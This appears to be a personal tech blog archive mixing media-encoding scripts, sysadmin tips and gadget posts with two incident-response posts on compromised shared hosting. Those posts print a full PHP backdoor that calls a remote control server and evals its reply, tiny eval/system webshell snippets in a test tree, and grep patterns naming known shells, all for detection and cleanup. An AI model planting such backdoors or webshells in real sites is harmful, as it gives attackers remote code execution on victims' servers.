Converting HDC-SD5 MTS AVCHD with ffmpeg

March 31, 2012 at 9:32 pm

This will convert *.MTS movies recorded with the highest-quality settings on a Panasonic HDC-SD5 to MPEG-4 in an AVI container. It is a re-encode, so it is not strictly lossless, but at a 12710k video bitrate (roughly the source rate) the loss is minimal. The single-letter options (-b, -ab) are the old ffmpeg syntax; current builds spell them -b:v and -b:a.

ffmpeg -i "${1}" -b 12710k -ac 2 -ab 256k -deinterlace -s 1920x1080 "${1}".avi

numbered filename .htaccess 404 redirect to php remote shells

June 30, 2011 at 2:36 am

A common backdoor once a host is compromised is to create .htaccess files, or append to existing ones, an ErrorDocument 404 directive pointing at a PHP script. Any request for a nonexistent URL under that directory then executes the script, which connects out to a control server; the trigger is usually legitimate crawling. Attackers deliberately backlink to nonexistent URLs on the compromised host so that Google et al. do the job of calling home to their control node for them. A symptom is a spike in load and in the number of httpd connections in the WAITING state while the site is being crawled.

The .htaccess and .php pair is usually generated into every single folder, with unique filenames. The PHP shell's filename is usually a 4-6 digit number but is sometimes a name reused from a word list. The .htaccess always contains the string "ErrorDocument 404 //", with two forward slashes leading the filename, and is usually less than 200 bytes:

Options -MultiViews
ErrorDocument 404 //wp-content/upload/2008/11/12433.php

There is little variation between copies of the numeric PHP shell; what changes is usually the payload and the destination host. A common file size is 1474 bytes and a common string is 'aHR0cDov', the base64 encoding of 'http:/'. Reading the sample: it base64-encodes the request metadata (host, URI, referer, user agent, client address, script path, accept-language) into a query string $z, sets the default control host $f from a base64 literal, lets the operator override $f through the id parameter when the MD5 of the q parameter matches a hard-coded hash, and then tries in turn include() of a remote URL (which only works with allow_url_include on), file_get_contents() followed by eval(), and finally curl followed by eval(). Whatever the control server returns is executed as PHP.

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a23ab92502c0050082dd96a32c754520") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
die(); ?>
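To read a shell like this without executing it, pull out every base64_decode("...") literal and decode it; the control hosts, the URL prefixes and the operator's override gate fall out directly. The Python below is an added example, not code from the original post. SAMPLE_SHELL is a constructed, condensed copy of the sample above (only the statements that carry literals, the md5 check and the three fetch attempts are kept), and the regexes assume the exact base64_decode("...") spelling used there; a variant that assembles its strings differently needs different patterns.

```python
import re
import base64
import binascii

# Constructed, condensed copy of the number shell above: only the statements that
# carry base64 literals, the md5 gate and the three fetch attempts are kept.
SAMPLE_SHELL = '''<? error_reporting(0);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($h);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a23ab92502c0050082dd96a32c754520") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);$o=curl_exec($cu);eval($o);};die(); ?>'''

B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
HOST_ASSIGN = re.compile(r'\$(\w+)\s*=\s*base64_decode\(["\']([A-Za-z0-9+/=]+)["\']\)\s*;')
FETCH_CALL = re.compile(
    r'(include|file_get_contents|curl_init)\(\s*base64_decode\(["\']([A-Za-z0-9+/=]+)["\']\)\s*\.\s*\$(\w+)')
MD5_GATE = re.compile(
    r'md5\(\$_REQUEST\["(\w+)"\]\)\s*==\s*["\']([0-9a-f]{32})["\']\)\s*\$(\w+)\s*=\s*\$_REQUEST\["(\w+)"\]')


def b64(text):
    """Decode one literal; None when it is not valid base64 (a decoy or a partial string)."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def decode_literals(php_source):
    """{literal: decoded} for every base64_decode("...") in the source, in source order."""
    return {lit: b64(lit) for lit in B64_LITERAL.findall(php_source)}


def md5_gate(php_source):
    """The operator's override: (checked_param, md5_hex, host_var, override_param) or None."""
    m = MD5_GATE.search(php_source)
    return m.groups() if m else None


def fetch_chain(php_source):
    """[(php_function, decoded_url_prefix, host_var)] in the order the shell tries them."""
    return [(fn, b64(lit), var) for fn, lit, var in FETCH_CALL.findall(php_source)]


def triage(php_source):
    """Reconstruct the control URLs the shell contacts when no override is supplied."""
    hosts = {var: b64(lit) for var, lit in HOST_ASSIGN.findall(php_source)}
    chain = fetch_chain(php_source)
    return {
        "literals": decode_literals(php_source),
        "default_hosts": hosts,
        "gate": md5_gate(php_source),
        "fetch_chain": chain,
        # prefix + default host; the path ($z) depends on the request and is omitted
        "c2_urls": [prefix + hosts.get(var, "$" + var) for _, prefix, var in chain],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SHELL).items():
        print(key, value)
```

The decoded hosts and the md5-gated override parameter are what go into a blocklist and a log search: the override means the same shell can be pointed at a new control server after the first domain is taken down, so search the access_log for requests carrying the q and id parameters as well.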

Identifying script versions from source

June 28, 2011 at 11:35 pm

Application     Identifier              File
Dolphin         ver                     inc/header.inc.php
Drupal          version                 modules/drupal/drupal.info
gallery2        setGalleryVersion       modules/core/module.inc
Joomla          RELEASE                 libraries/joomla/version.php
Movable Type    version                 mt-check.cgi
osCommerce      PROJECT_VERSION         includes/application_top.php
phpBB           PHPBB_VERSION           includes/constants.php
phpnuke         Version_Num             database: mysql> SELECT Version_Num FROM nuke_config;
phpwcms         version                 include/inc_lib/default.inc.php
smf             -                       index.php
tikiwiki        7=>'1.9.5'              tiki-admin_security.php
VtigerCRM       vtiger_current_version  vtigerversion.php
WordPress       wp_version              wp-includes/version.php
xcart           -                       VERSION
Zen Cart        -                       includes/version.php
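A scanner that walks a hosting tree and pulls the version string out of the marker files listed above, so outdated installs across many accounts can be found in one pass. This is an added example, not code from the original post; the regexes are my assumptions about each file's syntax (the $wp_version = '...' and define('PHPBB_VERSION', '...') forms are the ones exercised by the constructed sample tree; the Joomla and osCommerce patterns are untested here), and the sample version numbers are placeholders.

```python
import os
import re
import tempfile

# Marker files from the table above. The regexes are my assumptions about each
# file's syntax; only the WordPress and phpBB forms are exercised by the sample tree.
VERSION_MARKERS = {
    "WordPress": ("wp-includes/version.php",
                  re.compile(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]")),
    "phpBB": ("includes/constants.php",
              re.compile(r"define\(\s*['\"]PHPBB_VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")),
    "Joomla": ("libraries/joomla/version.php",
               re.compile(r"\$RELEASE\s*=\s*['\"]([^'\"]+)['\"]")),
    "osCommerce": ("includes/application_top.php",
                   re.compile(r"define\(\s*['\"]PROJECT_VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")),
}


def fingerprint(webroot):
    """{app: version} for marker files found directly under one webroot."""
    found = {}
    for app, (relpath, pattern) in VERSION_MARKERS.items():
        try:
            with open(os.path.join(webroot, relpath), "r", errors="replace") as fh:
                m = pattern.search(fh.read())
        except OSError:
            continue
        if m:
            found[app] = m.group(1)
    return found


def fingerprint_tree(root):
    """Walk a whole hosting tree (many accounts, nested installs) -> sorted (dir, app, version)."""
    results = []
    for dirpath, _, _ in os.walk(root):
        for app, version in fingerprint(dirpath).items():
            results.append((os.path.relpath(dirpath, root), app, version))
    return sorted(results)


def version_key(version):
    """Numeric sort key so installs can be compared with a chosen minimum:
    version_key("3.0.8") < version_key("3.0.10"); non-numeric suffixes are dropped."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def older_than(results, app, minimum):
    """Installs of `app` below `minimum`, e.g. every WordPress older than the current release."""
    return [r for r in results if r[1] == app and version_key(r[2]) < version_key(minimum)]


def build_sample_tree():
    """Constructed hosting tree with placeholder version numbers; returns its path."""
    root = tempfile.mkdtemp(prefix="fp-")

    def put(rel, text):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)

    put("alice/public_html/wp-includes/version.php", "<?php\n$wp_version = '3.1.4';\n")
    put("bob/public_html/forum/includes/constants.php", "<?php\ndefine('PHPBB_VERSION', '3.0.8');\n")
    put("bob/public_html/index.php", "<?php echo 'no CMS here'; ?>\n")
    return root


if __name__ == "__main__":
    for entry in fingerprint_tree(build_sample_tree()):
        print(*entry)
```

Because the walk checks every directory, installs nested below the webroot (a forum under /forum, a second blog under /old) are found as well; the relative directory in each result tells you which account owns it.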

vt6415 kernel panic when enumerating IDE devices

June 10, 2011 at 1:30 am

Even though the developers tried to resolve the known issues with pata controller vt6415, I still had Ubuntu 11.04 2.6.38-8 x64 panic on enumerating IDE devices.  The solution was boot parameter libata.dma=1.

bash script to encode mkv avi to mpeg-4

March 31, 2011 at 1:11 am

This will allow a classic XBOX to play 1280×720 video and should work for anything you can throw at mencoder.

#!/bin/bash
# Usage: ./mkv2xbox.sh movie.mkv
# Extracts the subtitle tracks, then encodes to MPEG-4 in an AVI container
# at a bitrate the classic XBOX can play.
src="${1:?usage: $0 file.mkv}"
# mkvinfo prints "Track number" two lines before "Track type", hence -B2
subtitletracks=$(mkvinfo "${src}" | fgrep -B2 "Track type: subtitles" | fgrep "Track number:" | awk '{print $NF}' | xargs)
echo "Found subtitle tracks: ${subtitletracks}"
count=$(echo ${subtitletracks} | wc -w)
if [ "${count}" -eq 0 ]; then
    echo "No subtitle tracks in ${src}; skipping extraction."
elif [ "${count}" -eq 1 ]; then
    mkvextract tracks "${src}" ${subtitletracks}:"${src}".avi.srt
else
    # several tracks: extract each to its own file, then copy the first as the default .srt
    for i in ${subtitletracks}; do
        mkvextract tracks "${src}" ${i}:"${src}".avi.srt.${i}
    done
    first=$(echo ${subtitletracks} | cut -d " " -f1)
    cp -i -a "${src}".avi.srt.${first} "${src}".avi.srt
fi
echo "Finished extracting subtitle tracks for ${src}. Now encoding video."
nice -n 19 ionice -c3 mencoder "${src}" -o "${src}".avi -oac copy -ovc lavc \
    -lavcopts vcodec=mpeg4:vbitrate=4000:vrc_maxrate=5000:vrc_buf_size=4096
echo "Finished encoding video for ${src}. Exit status was: ${?}"

CentOS 4 rpm --rebuilddb stuck on Packages

March 11, 2011 at 5:07 pm

If you have already removed /var/lib/rpm/__db* and rpm -vv --rebuilddb (or strace) shows it stuck on /var/lib/rpm/Packages, but you cannot salvage Packages because db_dump and db_load are unavailable, you can move Packages out of the way, run --rebuilddb, restore the old Packages, and run --rebuilddb again. rpm should then function correctly.

Finding compromised accounts in a shared hosting environment

January 30, 2011 at 9:37 pm

To locate a suspicious process’s (httpd, sendmail, perl) current working directory look in /proc/$PID/cwd

If httpd fullstatus isn’t available, you can use this to enumerate the current working directories of httpd processes:

for i in `ps -elf | grep '[h]ttp' | awk '{print $4}' | sort -u`; do readlink /proc/$i/cwd 2>/dev/null; done | sort | uniq -c | sort -n

If you do not have mytop, mysqladmin, or access to the mysql console, you can use this to count the open file descriptors of the mysqld process per database directory (the fifth path component under /var/lib/mysql), which shows which databases are busy:

ls -al /proc/`pidof mysqld`/fd/ | awk -F\> '{print $2}' | awk -F/ '{print $5}' | sort | uniq -c | sort -n

If you do not catch them quickly enough after they spawn, malicious processes typically daemonize: they fork, get reparented under init and chdir to /, so their cwd no longer points at the drop directory. Look in /tmp, /var/tmp and /dev/shm for clues, and use the timestamp on /proc/$PID (the process start time) to narrow the window to search for in the logs. You can always strace the suspicious process, and list what it has open with lsof and netstat.

To identify malicious files in a suspicious directory:

1. Scan their directory using maldet, which finds most newer PHP and Perl shells. It likely won't find older or custom payloads.

2. Scan their directory with clamav if there is time to spare. For our purpose there is fingerprint overlap with maldet but clamav has a larger database and may catch something.

3. Use the following for an audit against common shells and malicious files:

If they have gigs of files they may be a file dump. If they have only a few kilobytes it may be a new fraudulent account.

du -sh

Custom 404 redirects are not very common and are usually only found in the webroot’s .htaccess. A common attack is creating .htaccess files which 404 redirect to malicious files (usually a PHP shell with all-numeric filename) which connect to a remote server and open a shell.

find . -name .htaccess -print0 | xargs -0 fgrep ErrorDocument\ 404

These are search strings for common PHP shells. Note that intruders may use misleading extensions and prepend image file headers so that file(1) identifies the malicious file as an image.

find . -iname \*php -print0 | xargs -0 grep -E 'c99_|c99shell|999sh|fx29_|fx29shell|r57_|r57shell|aHR0cDov'

Base64-encoded content should be scrutinized as a potential payload. Intruders will copy file headers and templates from your software's installation (eg: WordPress) and wrap the real code in layers of encoding (gzinflate, base64, rot13) behind an eval(), so that it is hard to tell malicious code from legitimate footers, which sometimes carry inline images.

find . -iname \*php -print0 | xargs -0 fgrep base64_

Files with 777 permissions are world-writable, a security concern in themselves, and should be investigated.

find . -perm 777 -type f

find . -perm 777 -type d

Files with mode 000 may have been disabled by the user or an administrator due to suspicious behavior.

find . -perm 000

Files owned by root hopefully are from an administrator forgetting to assign them proper ownership and not a privilege escalation.

find . -user root

Files owned by the http server may indicate access was gained through the customer’s software.

find . -user nobody -o -user apache

Files modified recently are of primary concern. For a thorough check run a second pass on ctime: intruders can set mtime to a past date with touch, but ctime is updated by the kernel on every inode change and cannot be set from userland, so a backdated mtime with a recent ctime is itself a signal.

find . -mtime -1

find . -mtime +1 -mtime -10

find . -ctime -1

find . -ctime +1 -ctime -10
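The find/grep audit above, reimplemented as one Python pass so the results can be kept and diffed across servers. This is an added example, not code from the original post. It builds a constructed webroot (placeholder files reproducing the .htaccess 404 redirect, a numeric PHP shell carrying 'aHR0cDov', a GIF-headed file with embedded PHP, a 777 file and a 000 file) and runs the same checks over it; the shell's mtime is deliberately backdated to show why the ctime pass catches what the mtime pass misses. The signature list is the one from the grep above; the eval/gzinflate patterns and the image magic bytes are my additions.

```python
import os
import re
import stat
import time
import tempfile

# Shell strings from the grep above, plus the eval-of-encoded-payload wrappers
# and image magic bytes (my additions) that the text describes.
SHELL_SIGNATURES = re.compile(rb"c99_|c99shell|999sh|fx29_|fx29shell|r57_|r57shell|aHR0cDov")
OBFUSCATION = re.compile(rb"eval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)")
ERRORDOC_404 = re.compile(rb"^[ \t]*ErrorDocument[ \t]+404[ \t]+(\S+)", re.M)
NUMERIC_NAME = re.compile(r"^\d{4,6}\.php$", re.I)


def _read(path, limit=1 << 20):
    try:
        with open(path, "rb") as fh:
            return fh.read(limit)
    except OSError:          # unreadable (e.g. mode 000 when not root): skip content checks
        return b""


def find_404_htaccess(root):
    """(path, target) for every ErrorDocument 404 line under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            hits += [(path, m.group(1).decode("latin-1")) for m in ERRORDOC_404.finditer(_read(path))]
    return hits


def find_suspicious_php(root):
    """{path: [reasons]} for files that are, or contain, PHP and match a heuristic."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            data = _read(path)
            if not (name.lower().endswith(".php") or PHP_TAG.search(data)):
                continue
            reasons = []
            if NUMERIC_NAME.match(name):
                reasons.append("all-numeric filename")
            if SHELL_SIGNATURES.search(data):
                reasons.append("known shell string")
            if OBFUSCATION.search(data):
                reasons.append("eval of encoded payload")
            if data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data):
                reasons.append("image header with embedded PHP")
            if reasons:
                findings[path] = reasons
    return findings


def find_permission_issues(root):
    """(path, '777' | '000') for world-writable and fully disabled entries."""
    issues = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode in (0o777, 0o000):
                issues.append((path, "%03o" % mode))
    return issues


def recently_changed(root, since, field="mtime"):
    """Files whose mtime or ctime is newer than `since` (epoch seconds). Run both:
    mtime can be backdated with touch/utime, ctime cannot be set from userland."""
    attr = {"mtime": "st_mtime", "ctime": "st_ctime"}[field]
    return [os.path.join(d, n) for d, _, fs in os.walk(root) for n in fs
            if getattr(os.lstat(os.path.join(d, n)), attr) > since]


def build_sample_tree():
    """Constructed webroot reproducing the patterns above; returns the paths of interest."""
    root = tempfile.mkdtemp(prefix="audit-")

    def put(rel, data, mode=0o644):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
        return path

    clean = put("index.php", b"<?php echo 'clean'; ?>\n")
    put("wp-content/upload/2008/11/.htaccess",
        b"Options -MultiViews\nErrorDocument 404 //wp-content/upload/2008/11/12433.php\n")
    shell = put("wp-content/upload/2008/11/12433.php",
                b'<? error_reporting(0);$u=base64_decode("aHR0cDov");eval(base64_decode($_POST["c"])); ?>')
    gif = put("images/banner.gif",
              b"GIF89a\x01\x00\x01\x00<?php eval(gzinflate(base64_decode($_POST['c']))); ?>", 0o777)
    disabled = put("old/disabled.php", b"<?php system($_GET['c']); ?>\n", 0o000)
    old = time.time() - 30 * 86400
    os.utime(shell, (old, old))         # backdate mtime; ctime still records the write
    return {"root": root, "clean": clean, "shell": shell, "gif": gif,
            "disabled": disabled, "yesterday": time.time() - 86400}
```

Note that the content checks key on a PHP open tag rather than on the extension, which is what catches the banner.gif case; and the 000 file is reported by mode even when it cannot be read.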

You can supplement your investigation by parsing the access_log of the suspected target for suspicious POSTs (the field numbers below assume the Apache combined log format):

Referrers: cut -d " " -f11 access_log | sort | uniq -c | sort -n

Visitors: cut -d " " -f1 access_log | sort | uniq -c | sort -n

POSTs: fgrep POST access_log | fgrep -v " 404 " | cut -d " " -f7 | sort | uniq -c | sort -n

The error_log will have stderr output for injections and subsequent attempts to retrieve payloads from other servers, often using wget or curl.

grep -E 'wget|curl' error_log
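The same access_log and error_log questions (top visitors, top referrers, POSTs that did not 404, wget/curl in stderr) as a Python parser, which additionally flags POSTs to non-script extensions, the image-header trick noted above. This is an added example, not code from the original post; the log lines are constructed with documentation IP ranges and .invalid hostnames, and the regex assumes the standard Apache combined log format.

```python
import re
from collections import Counter

# Constructed sample lines in Apache combined format; addresses, paths and hosts
# are placeholders, not data from any real server.
ACCESS_LOG = """\
203.0.113.5 - - [30/Jan/2011:21:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0"
203.0.113.5 - - [30/Jan/2011:21:01:09 +0000] "GET /about/ HTTP/1.1" 200 2048 "http://www.example.com/index.php" "Mozilla/5.0"
198.51.100.7 - - [30/Jan/2011:21:02:11 +0000] "POST /wp-content/upload/2008/11/12433.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"
198.51.100.7 - - [30/Jan/2011:21:02:40 +0000] "POST /wp-content/upload/2008/11/12433.php HTTP/1.1" 200 299 "-" "Mozilla/4.0"
198.51.100.7 - - [30/Jan/2011:21:03:01 +0000] "POST /images/banner.gif HTTP/1.1" 200 118 "-" "Mozilla/4.0"
192.0.2.66 - - [30/Jan/2011:21:05:15 +0000] "GET /no-such-page-8841 HTTP/1.1" 404 310 "http://spam.example.net/links.html" "Googlebot/2.1"
192.0.2.66 - - [30/Jan/2011:21:05:16 +0000] "POST /gone.php HTTP/1.1" 404 290 "-" "Googlebot/2.1"
203.0.113.9 - - [30/Jan/2011:21:06:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://www.example.com/wp-login.php" "Mozilla/5.0"
"""

ERROR_LOG = """\
[Sun Jan 30 21:02:12 2011] [error] [client 198.51.100.7] PHP Warning: file_get_contents(http://7.example.invalid/?aHR0cDov): failed to open stream
[Sun Jan 30 21:02:41 2011] [error] [client 198.51.100.7] sh: wget: command not found
[Sun Jan 30 21:03:02 2011] [error] [client 198.51.100.7] curl: (6) Couldn't resolve host 'c2.example.invalid'
[Sun Jan 30 21:05:16 2011] [error] [client 192.0.2.66] File does not exist: /home/customer/public_html/gone.php
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')


def parse_access(text):
    """One dict per well-formed combined-format line; malformed lines are skipped."""
    for line in text.splitlines():
        m = COMBINED.match(line)
        if m:
            yield m.groupdict()


def top_counts(entries, field):
    """Equivalent of cut -f<n> | sort | uniq -c | sort -n, most frequent first."""
    return Counter(e[field] for e in entries).most_common()


def post_targets(entries):
    """POST paths that did not 404, like the fgrep POST | fgrep -v ' 404 ' pipeline above."""
    return Counter(e["path"] for e in entries
                   if e["method"] == "POST" and e["status"] != "404").most_common()


def posts_to_non_scripts(entries):
    """POSTs to files that should not accept input: a shell hidden behind an image extension."""
    return sorted({e["path"] for e in entries if e["method"] == "POST"
                   and not e["path"].lower().endswith((".php", ".cgi", ".pl"))})


def retrieval_attempts(error_text):
    """error_log lines mentioning wget or curl, paired with the client IP Apache logged."""
    tool = re.compile(r"\b(wget|curl)\b")
    client = re.compile(r"\[client (\S+)\]")
    out = []
    for line in error_text.splitlines():
        if tool.search(line):
            m = client.search(line)
            out.append((m.group(1) if m else None, line.strip()))
    return out


def triage(access_text, error_text):
    entries = list(parse_access(access_text))
    return {
        "visitors": top_counts(entries, "ip"),
        "referrers": top_counts(entries, "referer"),
        "posts": post_targets(entries),
        "posts_to_non_scripts": posts_to_non_scripts(entries),
        "retrievals": retrieval_attempts(error_text),
    }


if __name__ == "__main__":
    for key, value in triage(ACCESS_LOG, ERROR_LOG).items():
        print(key, value)
```

The client IP on the error_log lines is what ties a failed payload download back to the POSTs in the access_log; in the sample the same address posts to the numeric shell and to banner.gif and then tries wget and curl.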

Once you have filenames and their checksums and IP addresses, you can search other servers and their logs.

GNU Screen, Window Manager.

June 26, 2010 at 7:54 am

GUI is for the weak. Meet my window manager, GNU screen:

Small image of GNU screen setup

0. Build screen from source to fix the slowdown when scrolling in a vertical split.

1. This is my .screenrc with keyboard shortcuts and a nifty status bar.  –help?

Control + Up:  previous split screen
Control + Down: next split screen
Control + Left:  previous screen window
Control + Right: next screen window
F1: kill current tab
F2: write paste buffer to file
F3: split horizontally
F4: split vertically
F5: remove single split
F6: remove all splits
F7: urlview pulls URL's from your current output, very useful
F8: new tab
F9: resize split +1 line
F10: resize split -1 line

2. Install screen_ssh.sh so your window title automatically renames to your ssh destination.  To have the title revert after closing your shell follow this.

3. color = readability.  Install color wrapper to colorize your terminal output.  Alias man to use most as its pager.  Use the following for a colorful prompt with the last exit status ($?) as the second field:

00:43:18 0 user@hostname:~/$

\[\033[1;36m\]\t\[\033[0m\] `LastExitValue=$?; if [ $LastExitValue = 0 ]; then echo \[\033[1\;32m\]$LastExitValue\[\033[0m\]; else echo \[\033[1\;31m\]$LastExitValue\[\033[0m\]; fi` \[\033[1;34m\]\u@\h\[\033[0m\]:\[\033[1;33m\]\w\[\033[0m\]\[\033[1;32m\]\$\[\033[0m\]

To strip the color codes again (for sed -r / sed -E; note the character class is [mK], not [m|K]):  s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mK]//g

4. Yakuake is the best terminal emulator. Configure these shortcuts:

Shift + Left: previous shell
Shift + Right: next shell
F11: full screen
F12: drop down

Firefox Keyconfig

November 8, 2009 at 8:30 am


F1,Close Tab,BrowserCloseTabOrWindow();
user_pref("keyconfig.main.xxx_key1_Close Tab", "][][VK_F1][BrowserCloseTabOrWindow();][chrome://browser/content/browser.xul");
F2,Find,gFindBar.onFindCommand();
user_pref("keyconfig.main.xxx_key1_Find", "][][VK_F2][gFindBar.onFindCommand();][chrome://browser/content/browser.xul");
F3,Previous Tab,gBrowser.mTabContainer.advanceSelectedTab(-1,true);
user_pref("keyconfig.main.xxx_key1_Previous Tab", "][][VK_F3][gBrowser.mTabContainer.advanceSelectedTab(-1,true);][chrome://browser/content/browser.xul");
F4,Next Tab,gBrowser.mTabContainer.advanceSelectedTab(1,true);
user_pref("keyconfig.main.xxx_key1_Next Tab", "][][VK_F4][gBrowser.mTabContainer.advanceSelectedTab(1,true);][chrome://browser/content/browser.xul");
F5,Reload (override cache),BrowserReloadSkipCache();
user_pref("keyconfig.main.xxx_key1_Reload (override cache)", "][][VK_F5][BrowserReloadSkipCache();][chrome://browser/content/browser.xul");
F6,Select Address Bar,openLocation();
user_pref("keyconfig.main.xxx_key1_Select Address Bar", "][][VK_F6][openLocation();][chrome://browser/content/browser.xul");
F7,Undo Close Tab,undoCloseTab();
user_pref("keyconfig.main.xxx_key1_Undo Close Tab", "][][VK_F7][undoCloseTab();][chrome://browser/content/browser.xul");
F8,New Tab,BrowserOpenTab();
user_pref("keyconfig.main.xxx_key1_New Tab", "][][VK_F8][BrowserOpenTab();][chrome://browser/content/browser.xul");
F9,Back,BrowserBack();
user_pref("keyconfig.main.xxx_key1_Back", "][][VK_F9][BrowserBack();][chrome://browser/content/browser.xul");
F10,Forward,BrowserForward();
user_pref("keyconfig.main.xxx_key1_Forward", "][][VK_F10][BrowserForward();][chrome://browser/content/browser.xul");
F11,Full Screen,BrowserFullScreen();

disable in about:config
accessibility.browsewithcaret
accessibility.browsewithcaret_shortcut.enabled

Compiling VMware-server-1.0.8-126538 in 2.6.26-1-686

November 10, 2008 at 9:33 pm

1.  Make sure gcc and g++ versions match

2.  Use vmware-any-any-update117-itpsycho.tar.bz2 if any-any-updated117d doesn’t work.

3.  iocontrol.h s/168/138/ if needed

Lucky iPod Number Seven

September 26, 2008 at 3:34 pm

The first-generation iPod Shuffle offers superior sound quality in comparison to other digital audio players due to its SigmaTel STMP35xx chip having a push-pull headphone amp. Two transistors per channel instead of one result in a near-perfect square-wave rendering. Other single-capacitor audio players render it closer to a sine wave.

I have been so impressed by the sound quality and versatility of the first-generation Shuffle that I am on my seventh. Five replacements came under warranty from Apple within 48 hours. Apparently, the comfortable and useful lanyard does not imply jogging with it under your shirt. Sweat killed my first five – some within the same week. My sixth lived for over a year, outlasting its warranty before succumbing to the blinking light problem. Lucky number seven was sourced from an online acquaintance for less than what it would cost to drive to the Apple Store.

And it is this lucky Shuffle which has recently been set on fire. It was an honest accident involving an aerosol can as a makeshift flamethrower. Although scarred and stained, the Shuffle remains in active duty for my audio and pendrive needs. rebuild_db allows you to bypass the restrictive, bloated iTunes and simply drag files onto the Shuffle.

My headphones of choice are Skullcandy Ti's. They offer excellent sound quality for their price, are very comfortable, have an enticing warranty, and come in a stylish white.

sshfs instead of ftp

November 16, 2007 at 1:47 am

Got an ssh account on a machine? Don’t waste time retrieving a file, editing it, and uploading it manually.

sshfs user@target:/directory /mnt/point

You can then edit the file locally; every save is written back across the ssh connection.

Initial D Movie English subtitles

November 16, 2007 at 1:42 am

A week after the first engrish subtitles were released, I rewrote them into something more manageable. Some sites caught onto using my version, but today’s torrent still has the engrish .srt.

http://alexandrulazar.com/junk/articles/wrd-initiald-scr.srt

What to use instead of OiNK

October 28, 2007 at 12:19 am

For electronic music:

1. http://torrentech.org/

Some of the best, most obscure albums.

2. http://www.themixingbowl.org/

Excellent livesets, latest Essential Mix and Mary Anne Hobbs.

3. http://www.trancetraffic.com

0-day trance, house, techno albums and vinyl rips.

BCD2000: Affordable Digital Vinyl

September 29, 2007 at 11:38 pm

DJ’ing is an expensive hobby.

The industry-standard 1200s are a $400 investment and vinyl can be prohibitively expensive and inconvenient. CDJs, nevertheless being a source of free music, can cost upwards of $1000 and are the equivalent of choosing an automatic over a manual transmission in a sports car. A recent alternative is a Final Scratch/Serato Scratch Live system to allow you to incorporate a laptop into your setup, providing the complexity favored by Sasha while retaining the coolness of vinyl. While many may have an adequate laptop, finding an additional $500 to upgrade your vinyl isn't always easy. After all, there is a limit to the amount of fluids you can legally sell per day.

